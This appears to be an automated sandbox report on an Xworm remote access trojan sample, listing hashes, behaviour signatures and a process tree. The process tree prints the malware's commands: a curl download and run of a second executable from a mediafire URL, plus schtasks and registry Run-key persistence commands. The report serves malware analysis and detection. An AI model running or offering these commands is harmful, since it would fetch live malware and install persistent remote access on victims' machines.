Analysis

  • max time kernel
    22s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 22:07

General

  • Target

    XWormContent.exe

  • Size

    10KB

  • MD5

    7d4e7449b76c34210100ea88c163c7fb

  • SHA1

    ef679b47eb42f162355e8772ceb25712dc7ec75e

  • SHA256

    4fc4ae98d231e2bf0b8d4ad5463d9d4f673c1d5d63dc98838cf14a61d64ce6e6

  • SHA512

    d0ef46b3e5622160e9f6ce5cac8f2b14a10bad8e2c1f91a7e1d9713fd6ed844cf74817ca050e1a2d95ee9cd24ec01c67b6e279acddc95449553effbb8354ec1e

  • SSDEEP

    192:qLH2ANdaLix1upSiP/VunlYJLLLTuzTVQLFjb5cqfM:qLH2ydaLiO3hPLTucTf

Malware Config

Signatures

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWormContent.exe
    "C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:3224
      • C:\Windows\system32\curl.exe
        curl https://download1497.mediafire.com/av4hta6mkbagq9q63EQcCM1ZDZ0MJb3pOMqTati_JxDbj6616K7H9HKcefCbImq3V6MPY3E5pcdmBsEqSj4uScyyKg/ex02u2k9g7cros3/XClient.exe --output XWormPanel.exe
        3⤵
          PID:228
        • C:\Windows\system32\timeout.exe
          timeout -t 3
          3⤵
          • Delays execution with timeout.exe
          PID:4796
        • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe
          XWormPanel.exe
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3764
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWormPanel" /tr "C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe"
            4⤵
            • Creates scheduled task(s)
            PID:1676
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /delete /f /tn "XWormPanel"
            4⤵
              PID:2976
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1F7E.tmp.bat""
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3052
              • C:\Windows\system32\timeout.exe
                timeout 3
                5⤵
                • Delays execution with timeout.exe
                PID:1716
          • C:\Windows\system32\reg.exe
            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f
            3⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:2980
          • C:\Windows\system32\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f
            3⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1092

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

        Filesize

        156KB

        MD5

        ed44dc5ec5d2f4f29288cc873d7b6e5e

        SHA1

        63f471a8a2f5d21c6cc717ff4df5963fe0b426be

        SHA256

        4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

        SHA512

        5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

      • C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe

        Filesize

        156KB

        MD5

        ed44dc5ec5d2f4f29288cc873d7b6e5e

        SHA1

        63f471a8a2f5d21c6cc717ff4df5963fe0b426be

        SHA256

        4060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393

        SHA512

        5aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3

      • C:\Users\Admin\AppData\Local\Temp\cmd.bat

        Filesize

        1KB

        MD5

        9ed2e107d38ab102bfe7614cfd24e829

        SHA1

        9541263008adf001fa4c3a0236f627223380d509

        SHA256

        b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598

        SHA512

        31ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2

      • C:\Users\Admin\AppData\Local\Temp\tmp1F7E.tmp.bat

        Filesize

        162B

        MD5

        e6232656acc695403b429221c7e33dbb

        SHA1

        21a0bd725c5a0ab3936faad490b4671b01b4bb40

        SHA256

        ce0bf8ee1db154d086e0faf911c8b86404ffcfdada528cc0f8a6701555f09eb0

        SHA512

        c707fa683509236cdb097470d72e78658992400c6b16719d18f17de78dc857c8337f839aefb1be263a04e6c44409524053cefb92bcf094447ef0bbc825001f0a

      • C:\Users\Admin\AppData\Roaming\Temp

        Filesize

        1KB

        MD5

        9ed2e107d38ab102bfe7614cfd24e829

        SHA1

        9541263008adf001fa4c3a0236f627223380d509

        SHA256

        b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598

        SHA512

        31ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2

      • memory/3084-133-0x0000000000620000-0x0000000000628000-memory.dmp

        Filesize

        32KB

      • memory/3764-147-0x0000000000C30000-0x0000000000C5C000-memory.dmp

        Filesize

        176KB

      • memory/3764-161-0x000000001B8D0000-0x000000001B8E0000-memory.dmp

        Filesize

        64KB

      • memory/3764-162-0x000000001B8D0000-0x000000001B8E0000-memory.dmp

        Filesize

        64KB